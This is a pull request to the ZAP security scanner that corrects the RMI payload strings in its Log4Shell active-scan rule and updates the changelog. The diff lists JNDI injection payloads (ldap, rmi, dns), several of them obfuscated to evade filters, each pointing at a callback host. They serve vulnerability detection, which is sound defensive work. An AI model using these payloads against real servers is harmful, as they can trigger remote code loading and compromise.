### PR TITLE
ascanalpha: Log4Shell: Correct RMI Payloads

### DIFF
--- a/addOns/ascanrulesAlpha/CHANGELOG.md
+++ b/addOns/ascanrulesAlpha/CHANGELOG.md
@@ -5,6 +5,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
 
 ## Unreleased
 ### Fixed
+- Log4Shell: Fixed the RMI Payloads (Issue 7002).
 - Log4Shell: Continue with further payloads if one payload throws an error
 
 ## [34] - 2021-12-12

--- a/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/Log4ShellScanRule.java
+++ b/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/Log4ShellScanRule.java
@@ -41,13 +41,13 @@ public class Log4ShellScanRule extends AbstractAppParamPlugin {
     private static final String PREFIX = "ascanalpha.log4shell.";
     private static final String[] ATTACK_PATTERNS = {
         "${jndi:ldap://{0}/abc}",
-        "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{0}}/abc}",
-        "${${::-j}ndi:rmi://{0}}/abc}",
-        "${jndi:rmi://{0}}}",
-        "${${lower:jndi}:${lower:rmi}://{0}}/abc}",
-        "${${lower:${lower:jndi}}:${lower:rmi}://{0}}/abc}",
-        "${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{0}}/abc}",
-        "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{0}/abc}",
+        "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{0}/abc}",
+        "${${::-j}ndi:rmi://{0}/abc}",
+        "${jndi:rmi://{0}/abc}",
+        "${${lower:jndi}:${lower:rmi}://{0}/abc}",
+        "${${lower:${lower:jndi}}:${lower:rmi}://{0}/abc}",
+        "${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{0}/abc}",
+        "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://{0}/abc}",
         "${jndi:dns://{0}/abc}",
         "${jndi:${lower:l}${lower:d}a${lower:p}://{0}/abc}"
     };


### PR DESCRIPTION
Log4ShellScanner bugfixes: Fixes zaproxy/zaproxy#7002 RMI Payloads and continue with further payloads if one payload throws an error.

I tested all payloads with: 
```
sudo docker run -p 8000:8080 ghcr.io/christophetd/log4shell-vulnerable-app
``` 
Therefore the try..catch also addressed in #3421 is also necessary here.

Signed-off-by: Dennis Kniep <kniepdennis@gmail.com>